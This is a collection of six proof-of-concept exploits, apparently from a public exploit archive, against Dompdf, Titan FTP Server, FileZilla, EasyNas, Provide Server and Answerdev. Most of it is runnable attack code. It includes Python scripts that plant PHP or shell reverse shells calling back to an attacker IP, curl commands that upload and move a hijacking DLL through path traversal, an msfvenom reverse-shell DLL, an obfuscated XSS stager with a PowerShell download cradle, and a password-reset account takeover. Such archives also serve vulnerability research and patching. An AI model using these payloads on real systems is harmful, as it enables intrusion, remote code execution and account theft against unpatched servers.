<pre><code>#!/usr/bin/python3<br /><br /># Exploit Title: Dompdf 1.2.1 - Remote Code Execution (RCE)<br /># Date: 16 February 2023<br /># Exploit Author: Ravindu Wickramasinghe (@rvizx9)<br /># Vendor Homepage: https://dompdf.github.io/<br /># Software Link: https://github.com/dompdf/dompdf<br /># Version: <1.2.1<br /># Tested on: Kali linux<br /># CVE : CVE-2022-28368<br /># Github Link : https://github.com/rvizx/CVE-2022-28368<br /> <br />import subprocess<br />import re<br />import os<br />import sys<br />import curses<br />import requests<br />import base64<br />import argparse<br />import urllib.parse <br />from urllib.parse import urlparse<br /><br />def banner():<br /> print('''<br /><br /> \033[2mCVE-2022-28368\033[0m - Dompdf RCE\033[2m PoC Exploit<br /> \033[0mRavindu Wickramasinghe\033[2m | rvz - @rvizx9<br /> https://github.com/rvizx/\033[0mCVE-2022-28368<br /><br />''')<br /><br />exploit_font = b"AAEAAAAKAO+/vQADACBkdW0xAAAAAAAAAO+/vQAAAAJjbWFwAAwAYAAAAO+/vQAAACxnbHlmNXNj77+9AAAA77+9AAAAFGhlYWQH77+9UTYAAADvv70AAAA2aGhlYQDvv70D77+9AAABKAAAACRobXR4BEQACgAAAUwAAAAIbG9jYQAKAAAAAAFUAAAABm1heHAABAADAAABXAAAACBuYW1lAEQQ77+9AAABfAAAADhkdW0yAAAAAAAAAe+/vQAAAAIAAAAAAAAAAQADAAEAAAAMAAQAIAAAAAQABAABAAAALe+/ve+/vQAAAC3vv73vv73vv73vv70AAQAAAAAAAQAKAAAAOgA4AAIAADMjNTowOAABAAAAAQAAF++/ve+/vRZfDzzvv70ACwBAAAAAAO+/vRU4BgAAAADvv70m270ACgAAADoAOAAAAAYAAQAAAAAAAAABAAAATO+/ve+/vQASBAAACgAKADoAAQAAAAAAAAAAAAAAAAAAAAIEAAAAAEQACgAAAAAACgAAAAEAAAACAAMAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEADYAAwABBAkAAQACAAAAAwABBAkAAgACAAAAAwABBAkAAwACAAAAAwABBAkABAACAAAAcwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="<br /><br />def get_ip_addresses():<br /> output = subprocess.check_output(['ifconfig']).decode()<br /> ip_pattern = r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}'<br /> ip_addresses = re.findall(ip_pattern, output)<br /> ip_addresses = [ip for ip in ip_addresses if not ip.startswith('255')]<br /> ip_addresses = list(set(ip_addresses))<br /> ip_addresses.insert(0, 'localhost')<br /> return ip_addresses<br /><br />def choose_ip_address(stdscr, ip_addresses):<br /> curses.curs_set(0)<br /> curses.noecho()<br /> stdscr.keypad(True)<br /> current_row = 0<br /> num_rows = len(ip_addresses)<br /> stdscr.addstr("[ins]: please select an ip address, use up and down arrow keys, press enter to select.\n\n")<br /> while True:<br /> stdscr.clear()<br /> stdscr.addstr("[ins]: please select an ip address, use up and down arrow keys, press enter to select.\n\n")<br /> for i, ip_address in enumerate(ip_addresses):<br /> if i == current_row:<br /> stdscr.addstr(ip_address, curses.A_REVERSE)<br /> else:<br /> stdscr.addstr(ip_address)<br /> stdscr.addstr("\n")<br /> key = stdscr.getch()<br /> if key == curses.KEY_UP and current_row > 0:<br /> current_row -= 1<br /> elif key == curses.KEY_DOWN and current_row < num_rows - 1:<br /> current_row += 1<br /> elif key == curses.KEY_ENTER or key in [10, 13]:<br /> return ip_addresses[current_row]<br /><br />def help():<br /> print('''<br />usage: <br /> ./dompdf-rce --inject <css-inject-endpoint> --dompdf <dompdf-instance> <br /><br />example:<br /> ./dompdf-rce --inject https://vuln.rvz/dev/convert-html-to-pdf?html= --dompdf https://vuln.rvz/dompdf/<br /><br />notes: <br /> - Provide the parameters in the URL (regardless the request method)<br /> - Known Issues! - Testing with https://github.com/positive-security/dompdf-rce <br /> The program has been successfully tested for RCE on some systems where dompdf was implemented,<br /> But there may be some issues when testing with the dompdf-rce PoC at https://github.com/positive-security/dompdf-rce<br /> due to a known issue described at https://github.com/positive-security/dompdf-rce/issues/2. <br /> In this application, the same implementation was added for now. <br /> Although it may be pointless at the moment, you can still manually add the payload <br /> by copying the exploit_font.php file to ../path-to-dompdf-rce/dompdf/applicaiton/lib/fonts/exploitfont_normal_3f83639933428d70e74a061f39009622.php <br /> <br /> - more : https://www.cve.org/CVERecord?id=CVE-2022-28368<br />''')<br /><br /> sys.exit()<br /><br />def check_url(url):<br /> regex = re.compile(<br /> r'^(?:http|ftp)s?://' <br /> r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|'<br /> r'localhost|' <br /> r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'<br /> r'(?::\d+)?'<br /> r'(?:/?|[/?]\S+)$', re.IGNORECASE)<br /> if not re.match(regex, url):<br /> print(f"\033[91m[err]:\033[0m {url} is not a valid url")<br /> return False<br /> else:<br /> return True<br /><br /><br />def final_param(url):<br /> query_start = url.rfind('?')<br /> if query_start == -1:<br /> query_start = url.rfind('&')<br /> if query_start == -1:<br /> return None<br /> query_string = url[query_start+1:]<br /><br /> for param in reversed(query_string.split('&')):<br /> if '=' in param:<br /> name = param.split('=')[0]<br /> if name:<br /> return name<br /> return None<br /><br /><br />if __name__ == '__main__':<br /> banner()<br /> ports = ['9001', '9002']<br /> for port in ports:<br /> try:<br /> processes = subprocess.check_output(["lsof", "-i", "TCP:9001-9002"]).decode("utf-8")<br /> for line in processes.split("\n"):<br /> if "LISTEN" in line:<br /> pid = line.split()[1]<br /> port = line.split()[8].split(":")[1]<br /> if port == "9001" or port == "9002":<br /> os.system("kill -9 {}".format(pid))<br /> print(f'\033[94m[inf]:\033[0m processes running on port {port} have been terminated') <br /> except:<br /> pass<br /><br /> if len(sys.argv) == 1:<br /> print("\033[91m[err]:\033[0m no endpoints were provided. try --help")<br /> sys.exit(1)<br /><br /> elif sys.argv[1] == "--help" or sys.argv[1] == "-h":<br /> help()<br /><br /> elif len(sys.argv) > 1:<br /> parser = argparse.ArgumentParser(description='',add_help=False, usage="./dompdf-rce --inject <css-inject-endpoint/file-with-multiple-endpoints> --dompdf <dompdf-instance-endpoint>")<br /> parser.add_argument('--inject', type=str, help='[info] provide the url of the css inject endpoint', required=True)<br /> parser.add_argument('--dompdf', type=str, help='[info] provide the url of the dompdf instance', required=True)<br /> args = parser.parse_args()<br /> injectpoint = args.inject<br /> dompdf_url = args.dompdf<br /><br /> if not check_url(injectpoint) and (not check_url(dompdf_url)):<br /> sys.exit() <br /><br /> param=final_param(injectpoint)<br /> if param == None:<br /> print("\n\033[91m[err]: no parameters were provided! \033[0mnote: provide the parameters in the url (--inject-css-endpoint url?param=) ")<br /> sys.exit()<br /><br /> ip_addresses = get_ip_addresses()<br /> sip = curses.wrapper(choose_ip_address, ip_addresses)<br /> print(f'\033[94m[inf]:\033[0m selected ip address: {sip}')<br /> <br /> shell = '''<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/'''+sip+'''/9002 0>&1'");?>'''<br /> print("\033[94m[inf]:\033[0m using payload: " +shell)<br /> <br /> print("\033[94m[inf]:\033[0m generating exploit.css and exploit_font.php files...") <br /> decoded_data = base64.b64decode(exploit_font).decode('utf-8')<br /> decoded_data += '\n' + shell<br /> css = '''<br />@font-face {<br /> font-family:'exploitfont';<br /> src:url('http://'''+sip+''':9001/exploit_font.php');<br /> font-weight:'normal';<br /> font-style:'normal';<br />}<br /> '''<br /> with open("exploit.css","w") as f:<br /> f.write(css)<br /> with open("exploit_font.php","w") as f:<br /> f.write(decoded_data)<br /> print("\033[94m[inf]:\033[0m starting http server on port 9001..")<br /> http_server = subprocess.Popen(['python', '-m', 'http.server', '9001'])<br /> url = "http://"+sip+":9001/exploit_font.php"<br /> echo_output = subprocess.check_output(['echo', '-n', url.encode()])<br /> md5sum_output = subprocess.check_output(['md5sum'], input=echo_output)<br /> md5_hash = md5sum_output.split()[0].decode()<br /> print("\033[94m[inf]:\033[0m url hash: "+md5_hash)<br /> print("\033[94m[inf]:\033[0m filename: exploitfont_normal_"+md5_hash+".php")<br /> print("\033[94m[inf]:\033[0m sending the payloads..\n")<br /> <br /> url = injectpoint<br /> if url.endswith("/"):<br /> url = url[:-1]<br /><br /> headers = {<br /> 'Host': urlparse(injectpoint).hostname,<br /> 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0',<br /> 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',<br /> 'Accept-Language': 'en-US,en;q=0.5',<br /> 'Connection': 'close',<br /> 'Upgrade-Insecure-Requests': '1',<br /> 'Content-Type': 'application/x-www-form-urlencoded',<br /> }<br /><br /> payload="<link rel=stylesheet href=\'http://"+sip+":9001/exploit.css\'>"<br /> data = '{\r\n"'+param+'": "'+payload+'"\r\n}' <br /> try:<br /> response1 = requests.get(url+urllib.parse.quote(payload),headers=headers,)<br /> response2 = requests.post(url, headers=headers, data=data, verify=False)<br /> except:<br /> print("\033[91m[err]:\033[0m failed to send the requests! check connection to the host")<br /> sys.exit()<br /><br /> if response1.status_code == 200 or response2.status_code == 200:<br /> print("\n\033[92m[inf]: success!\033[0m \n\033[94m[inf]:\033[0m url: "+url+" - status_code: 200")<br /> else:<br /> print("\n\033[91m[err]: failed to send the exploit.css!\033[0m \n\033[94m[inf]:\033[0m url: "+url+" - status_code: "+str(response1.status_code)+","+str(response2.status_code))<br /><br /> print("\033[94m[inf]:\033[0m terminating the http server..")<br /> http_server.terminate()<br /><br /> print("\033[93m[ins]:\033[0m start a listener on port 9002 (execute the command on another terminal and press enter)")<br /> print("\nnc -lvnp 9002")<br /> input("\n\033[93m[ins]:\033[0m press enter to continue!")<br /> print("\033[93m[ins]:\033[0m check for connections!")<br /> <br /> del headers['Content-Type'] <br /> url = dompdf_url<br /> if url.endswith("/"):<br /> url = url[:-1]<br /><br /> url+="/lib/fonts/exploitfont_normal_"+md5_hash+".php" <br /> response = requests.get(<br /> url,<br /> headers=headers,<br /> verify=False, )<br /> <br /> if response.status_code == 200:<br /> print("\n\033[92m[inf]: success!\033[0m \n\033[94m[inf]:\033[0m url: "+url+" - status_code: "+str(response.status_code))<br /> else:<br /> print("\n\033[91m[err]: failed to trigger the payload! \033[0m \n\033[94m[inf]:\033[0m url: "+url+" - status_code: "+str(response.status_code)) <br /> print("\033[94m[inf]:\033[0m process complete!")<br /> <br /><br /></code></pre>
<pre><code>Titan FTP Server Path Traversal Vulnerability in move-file Function<br />Version: < 2.0.1.2102<br />CVE-2023-22629<br />CWE-24: Path Traversal<br /><br />TitanFTP Server is vulnerable to a path traversal attack in the move-file function. An attacker can exploit this vulnerability by providing a specially crafted newPath parameter that contains directory traversal sequences (e.g., '../') to move a file to a directory outside the intended directory. This can allow an attacker to access sensitive files and execute arbitrary code. The vulnerability exists because the server does not properly validate the user-supplied newPath parameter. As a result, an attacker can send a request with the malicious parameter to bypass the intended directory and access unauthorized files.<br /><br />This is an authenticated exploit. An attacker would need a user account on the TitanFTP server, to upload the files.<br /><br />CWE-427: Uncontrolled Search Path Element<br /><br />The service-application is vulnerable to a DLL search order hijack. It is importing several Windows DLL-files, like version.dll. By placing a proxy-DLL named version.dll exploiting the path traversal vulnerability, this DLL will proxy imports to the original version.dll also uploaded in the application directory, with the name version32.dll, one will gain Remote Code Execution on the server as NT System.<br /><br /><br />Exploit code<br /><br />Using this batchfile, an authenticated attacker can upload 2 dll-files, doing DLL-Hijack by proxy. In this poc, I am uploading a reverse-shell DLL-File, named version.dll, that proxies exports to the original version.dll, here named version32.dll.<br /><br /><br /><br /><br />#!/bin/bash<br /><br />url="http://192.168.16.226"<br />user="me"<br />pass="me"<br />proxydll="version.dll"<br />orig_dll="version32.dll"<br /><br />host=$(echo -n $url|cut -d/ -f 3)<br />auth=$(curl -s -k -X POST -H "Host: $host" -H "No-Auth-Challenge: true" -H "User-Agent: Nah" -H "content-type: application/json" -H "Accept: */*" -H "Origin:$url" -H "Referer: $url" -H "Accept-Encoding: gzip, deflate" -H "Accept-Language: en-US,en;q=0.9,nb;q=0.8,no;q=0.7,en-GB;q=0.6" -H "Connection: close" -d "{\"user\":\"$user\",\"pass\":\"$pass\",\"ticket\":null,\"showEULA\":false}" "$url/WebApi/Login") <br />SessionId=$(echo -n $auth |jq .auth.SessionId)<br />SessionId=$(echo -n "${SessionId//\"}")<br />ServerGUID=$(echo -n $auth |jq .auth.ServerGUID)<br />ServerGUID=$(echo -n "${ServerGUID//\"}")<br /><br />#Uploading files<br />curl -i -s -k -v -X POST -H "User-Agent: Nah" -H 'No-Auth-Challenge: true' -H 'enctype: multipart/form-data' -H "SRTSessionId: $SessionId" -F "request={\"Model\":\"MxUtilFileAction\",\"ServerGUID\":\"$ServerGUID\",\"Action\":\"l\",\"SRTSessionId\":\"$SessionId\",\"Ticket\":null,\"Data\":{\"action\":\"uc\",\"chunkData\":{\"UploadUid\":\"935ee903-2f65-442a-8a0b-1b23d12537c5\",\"FileName\":\"$proxydll\",\"RelativeFullPath\":\"/$proxydll\",\"ContentType\":\"contenttype\",\"ChunkIndex\":0,\"ChunkSize\":2,\"TotalChunks\":1,\"TotalFileSize\":19456,\"Overwrite\":true},\"domainData\":false,\"domainLogs\":false,\"SRTSessionId\":\"$SessionId\"}}" -F "chunk=@$proxydll;filename=blob;type=application/octet-stream" $url/WebApi/ProcessWithChunk<br />curl -i -s -k -v -X POST -H "User-Agent: Nah" -H 'No-Auth-Challenge: true' -H 'enctype: multipart/form-data' -H "SRTSessionId: $SessionId" -F "request={\"Model\":\"MxUtilFileAction\",\"ServerGUID\":\"$ServerGUID\",\"Action\":\"l\",\"SRTSessionId\":\"$SessionId\",\"Ticket\":null,\"Data\":{\"action\":\"uc\",\"chunkData\":{\"UploadUid\":\"935ee903-2f65-442a-8a0b-1b23d12537c5\",\"FileName\":\"$orig_dll\",\"RelativeFullPath\":\"/$orig_dll\",\"ContentType\":\"contenttype\",\"ChunkIndex\":0,\"ChunkSize\":2,\"TotalChunks\":1,\"TotalFileSize\":19456,\"Overwrite\":true},\"domainData\":false,\"domainLogs\":false,\"SRTSessionId\":\"$SessionId\"}}" -F "chunk=@$orig_dll;filename=blob;type=application/octet-stream" $url/WebApi/ProcessWithChunk<br /><br />#Moving them into c:\Program Files\South River Technologies\srxserver\"<br />curl -i -s -k -X POST -H "No-Auth-Challenge: true" -H "SRTSessionId: $SessionId" -H "User-Agent: Nah" -H "content-type: application/json" -H "Accept: */*" -H "Origin: $url" -H "Referer: $url/" -H "Accept-Encoding: gzip, deflate" -H "Accept-Language: en-US,en;q=0.9,nb;q=0.8,no;q=0.7,en-GB;q=0.6" -H "Connection: close" -d "[{\"Model\":\"MxUtilFileAction\",\"ServerGUID\":\"$ServerGUID\",\"Action\":\"l\",\"disableErrorSnackBar\":true,\"Data\":{\"action\":\"mv\",\"path\":\"/$proxydll\",\"newPath\":\"/../../../../../../../Program Files/South River Technologies/srxserver/$proxydll\",\"domainData\":false,\"domainLogs\":false,\"SRTSessionId\":\"$SessionId\"},\"SRTSessionId\":\"$SessionId\"}]" "$url/WebApi/Process"<br />curl -i -s -k -X POST -H "No-Auth-Challenge: true" -H "SRTSessionId: $SessionId" -H "User-Agent: Nah" -H "content-type: application/json" -H "Accept: */*" -H "Origin: $url" -H "Referer: $url/" -H "Accept-Encoding: gzip, deflate" -H "Accept-Language: en-US,en;q=0.9,nb;q=0.8,no;q=0.7,en-GB;q=0.6" -H "Connection: close" -d "[{\"Model\":\"MxUtilFileAction\",\"ServerGUID\":\"$ServerGUID\",\"Action\":\"l\",\"disableErrorSnackBar\":true,\"Data\":{\"action\":\"mv\",\"path\":\"/$orig_dll\",\"newPath\":\"/../../../../../../../Program Files/South River Technologies/srxserver/$orig_dll\",\"domainData\":false,\"domainLogs\":false,\"SRTSessionId\":\"$SessionId\"},\"SRTSessionId\":\"$SessionId\"}]" "$url/WebApi/Process"<br /><br /></code></pre>
<pre><code>#---------------------------------------------------------<br /># Title: FileZilla Client 3.63.1 - 'TextShaping.dl' DLL Hijacking<br /># Date: 2023-02-14<br /># Author: Bilal Qureshi<br /># Vendor: https://filezilla-project.org/<br /># Version: 3.63.1<br /># Tested on: Windows 10 Pro 64-bit (10.0, Build 19044)<br />#---------------------------------------------------------<br /><br /><br />Description:<br />FileZilla is a free and open-source, cross-platform FTP application, consisting of FileZilla Client and FileZilla Server. Clients are available for Windows, Linux, and macOS. Both server and client support FTP and FTPS, while the client can in addition connect to SFTP servers.<br /><br /><br />DLL Library named TextShaping.dll is not present at the FileZilla folder, this file can be loaded with the app.<br />Make malicious .dll file via msfvenom<br /><br />msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=7777 -f dll -o TextShaping.sll<br /><br />place at the destination folder<br /><br />start listener via nc<br /><br />nc -lvp 7777<br /><br />C:\PRogram Files\FileZilla FTP Client><br />C:\PRogram Files\FileZilla FTP Client><br /><br /></code></pre>
<pre><code># Exploit Title: EasyNas 1.1.0 - OS Command Injection<br /># Date: 2023-02-9<br /># Exploit Author: Ivan Spiridonov (ivanspiridonov@gmail.com)<br /># Author Blog: https://xbz0n.medium.com<br /># Version: 1.0.0<br /># Vendor home page : https://www.easynas.org<br /># Authentication Required: Yes<br /># CVE : CVE-2023-0830<br /><br />#!/usr/bin/python3<br /><br />import requests<br />import sys<br />import base64<br />import urllib.parse<br />import time<br /><br />from requests.packages.urllib3.exceptions import InsecureRequestWarning<br /><br /># Disable the insecure request warning<br />requests.packages.urllib3.disable_warnings(InsecureRequestWarning)<br /><br />if len(sys.argv) < 6:<br /> print("Usage: ./exploit.py http(s)://url username password listenerIP listenerPort")<br /> sys.exit()<br /><br />url = sys.argv[1]<br />user = sys.argv[2]<br />password = sys.argv[3]<br /><br /># Create the payload<br />payload = "/bin/sh -i >& /dev/tcp/{}/{} 0>&1".format(sys.argv[4], sys.argv[5])<br /><br /># Encode the payload in base64<br />payload = base64.b64encode(payload.encode()).decode()<br /><br /># URL encode the payload<br />payload = urllib.parse.quote(payload)<br /><br /># Create the login data<br />login_data = {<br /> 'usr':user,<br /> 'pwd':password,<br /> 'action':'login'<br />}<br /><br /># Create a session<br />session = requests.Session()<br /><br /># Send the login request<br />print("Sending login request...")<br />login_response = session.post(f"https://{url}/easynas/login.pl", data=login_data, verify=False)<br /><br /># Check if the login was successful<br />if 'Login to EasyNAS' in login_response.text:<br /> print("Unsuccessful login")<br /> sys.exit()<br />else:<br /> print("Login successful")<br /><br /><br /># send the exploit request<br />timeout = 3<br /><br />try:<br /> exploit_response = session.get(f'https://{url}/easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=%7cecho+{payload}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23', headers={'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0'}, timeout = timeout, verify=False)<br /> if exploit_response.status_code != 200:<br /> print("[+] Everything seems ok, check your listener.")<br /> else:<br /> print("[-] Exploit failed, system is patched or credentials are wrong.")<br /><br />except requests.exceptions.ReadTimeout:<br /> print("[-] Everything seems ok, check your listener.")<br /> sys.exit()<br /> <br /><br /></code></pre>
<pre><code>Provide Server v. 14.4<br />CVE-2023-23286<br />Vulnerabilities:<br />CWE-79: Improper Neutralization of Input During Web Page Generation<br /><br />Unauthenticated stored XSS in server-log delivered via username field from login-form<br />CWE-352: Cross-Site Request Forgery<br /><br />CSRF-token exposed in javascript, making it possible to obtain a valid CSRF-Token and use it in XMLHTTPRequests. This vulnerability allows an attacker to add a task that runs commands on the server as "NT-System" Impact:<br /><br /> An attacker could exploit the unauthenticated stored XSS vulnerability by injecting malicious code into the login form's username field. When the server-log is viewed, the malicious code will be executed, potentially allowing the attacker to steal user data or execute further attacks.<br /> By exploiting the CSRF vulnerability, an attacker could add a task to the server that runs commands with NT-System privileges. This could potentially allow the attacker to take complete control of the server, access sensitive data, or disrupt service.<br /><br />Proof Of Consept<br />RCE via XSS and CSRF<br /><br /> The attacker places the staged XSS into the username field and sends the login request. This will place the XSS stager in the server log and trigger when a administrator opens the log.<br /> The XSS stager downloads and runs the XSS payload. The payload will add a task that runs the powershell downloadcradle every time someone connects to the server. Even unauthenticated connections.<br /> The powershell-script downloaded in this example is a reverse shell, connecting back to the attacker. As the task runs as NT System on the server, the attacker will have full controll on the server.<br /><br />Powershell Downloadcradle<br /><br />PowerShell -noprofile -executionpolicy bypass "Start-process powershell.exe -argumentlist '-window hidden -noexit Start-Job { IEX(IWR https://example.com/rev.ps1 -UseBasicParsing) }'";exit<br />Staged XSS<br /><br /><img id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZXhhbXBsZS5jb20veHNzLmpzIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw src=https://example.com/1 onload=eval(atob(this.id))><br />XSS payload<br /><br /><br /><br />var vhost = window.location.protocol+'\/\/'+window.location.host<br />var csrf_token = document.querySelector("meta[name='csrf-token']").getAttribute("content")<br /> , o = XMLHttpRequest.prototype.open;<br />XMLHttpRequest.prototype.open = function(a, b) {<br /> var c = o.apply(this, arguments);<br /> return (b.startsWith("/") || b.startsWith(window.location.origin)) && this.setRequestHeader("X-CSRF-Token", csrf_token),<br /> c<br />}<br /><br /> <br /><br />fetch(vhost+'/ajax/SetEventsAndMessages',{<br /> method: 'POST',<br /> headers: {<br /> 'Content-Length': '3845', <br /> 'Sec-Ch-Ua': '"Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"', <br /> 'X-Csrf-Token': csrf_token, <br /> 'Sec-Ch-Ua-Mobile': '?0', <br /> 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.54', <br /> 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8', <br /> 'Accept': 'application/json, text/javascript, */*; q=0.01', <br /> 'X-Requested-With': 'XMLHttpRequest', <br /> 'Sec-Ch-Ua-Platform': '"macOS"', <br /> 'Origin': vhost, <br /> 'Sec-Fetch-Site': 'same-origin', <br /> 'Sec-Fetch-Mode': 'cors', <br /> 'Sec-Fetch-Dest': 'empty', <br /> 'Accept-Encoding': 'gzip, deflate', <br /> 'Accept-Language': 'en-US,en;q=0.9,nb;q=0.8,no;q=0.7,en-GB;q=0.6', <br /> 'Connection': 'close'<br /> },<br /> credentials: 'include',<br /> body: '%7B%22MsgOnCreateDirectory%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Requested+file+action+okay,+completed.%22%7D,%22MsgOnUploadStart%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22File+status+okay;+about+to+open+data+connection.%22%7D,%22MsgOnUploadEnd%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Closing+data+connection.%22%7D,%22MsgOnDownloadEnd%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Closing+data+connection.%22%7D,%22MsgOnRemoveDirectory%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Requested+file+action+okay,+completed.%22%7D,%22MsgBeforeCreateDirectory%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgBeforeRename%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgBeforeRemoveDirectory%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgOnQuit%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Goodbye.%22%7D,%22MsgOnCopy%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Requested+file+action+okay,+completed.%22%7D,%22MsgOnDownloadStart%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22File+status+okay;+about+to+open+data+connection.%22%7D,%22MsgBeforeUpload%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgOnListDirectoryEnd%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Closing+data+connection.%22%7D,%22MsgBeforeLoggedIn%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Login+not+accepted%22%7D,%22MsgOnRename%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Requested+file+action+okay,+completed.%22%7D,%22MsgBeforeConnect%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Not+connected,+access+denied.+Please+don\'t+hammer.%22%7D,%22MsgBeforeDownload%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgOnChangeDirectory%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22CWD+Command+successful.%22%7D,%22MsgOnConnect%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22%25EXECUTE(PowerShell++-noprofile+-executionpolicy+bypass+%5C%22Start-process+powershell.exe+-argumentlist+\'-window+hidden+-noexit+Start-Job+-ScriptBlock+%7B+IEX(IWR+https://example.com/rev.ps1+-UseBasicParsing)+%7D\'%5C%22;exit)%25%22%7D,%22MsgOnListDirectoryStart%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Opening+connection+for+/bin/ls.%22%7D,%22MsgBeforeRemoveFile%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgBeforeChangeDirectory%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgOnDisconnect%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22%22%7D,%22MsgOnRemoveFile%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Requested+file+action+okay,+completed.%22%7D,%22MsgBeforeCopy%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgBeforeListDirectory%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgOnLoggedIn%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22User+logged+in,+proceed.%22%7D%7D'<br />});<br /><br />window.location.href = vhost;<br />fetch(vhost.replace(':8443',''))<br /><br /><br /><br /><br />Bash script for running exploit<br /><br /><br />#!/bin/bash<br />echo "Sending payload"<br />host=$1<br /><br />if [ "$2" == "trigger" ]<br /> then<br /> curl -s -k https://$1 >/dev/null<br />else<br /><br />curl -i -s -k $'POST' -H $host -H $'Content-Length: 262' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-User: ?1' -H $'Sec-Fetch-Dest: document' -H "Referer: https://$host" -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9,nb;q=0.8,no;q=0.7,en-GB;q=0.6' -H $'Connection: close' --data-binary $'path=%2F&username=%3Cimg+id%3DdmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZjIwLmJlL2FsZXJ0Mi5qcyI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs%3D+src%3Dhttps%3A%2F%2Ff20.be%2F1+onload%3Deval%28atob%28this.id%29%29%3E&password=&logon=Log+in' "https://$host" > /dev/null<br />clear<br />fi<br />echo "Waiting..."<br />rlwrap nc -lvnp 5555<br /><br /></code></pre>
<pre><code># Exploit Title: Answerdev 1.0.3 - Account Takeover <br /># Date: Reported on Jan 24th 2023<br /># Exploit Author: Eduardo Pérez-Malumbres Cervera @blueudp<br /># Vendor Homepage: https://answer.dev/<br /># Software Link: https://github.com/answerdev/answer<br /># Version: 1.0.3<br /># Tested on: Ubuntu 22.04 / Debian 11<br /># CVE : CVE-2023-0744<br /><br /><br />from sys import argv<br />import urllib3<br />from requests import post<br /><br />urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)<br /><br /><br />def ato(url: list, email: str) -> str:<br /> try:<br /> return f"Your Link: {''.join(url)}users/password-reset?code=" + \<br /> post(f"{''.join(url)}answer/api/v1/user/password/reset", json={"e_mail": email}, verify=False).json()["data"]<br /> except Exception as err:<br /> return f"Cant reach URL: {err}"<br /><br /><br />if __name__ == "__main__":<br /> if len(argv) != 3:<br /> print(f"Usage: {argv[0]} https://answer.domain/ myemail@localhost.com")<br /> exit()<br /><br /> print(ato([argv[1] if argv[1].endswith("/") else argv[1] + "/"], str(argv[2])))<br /> <br /></code></pre>
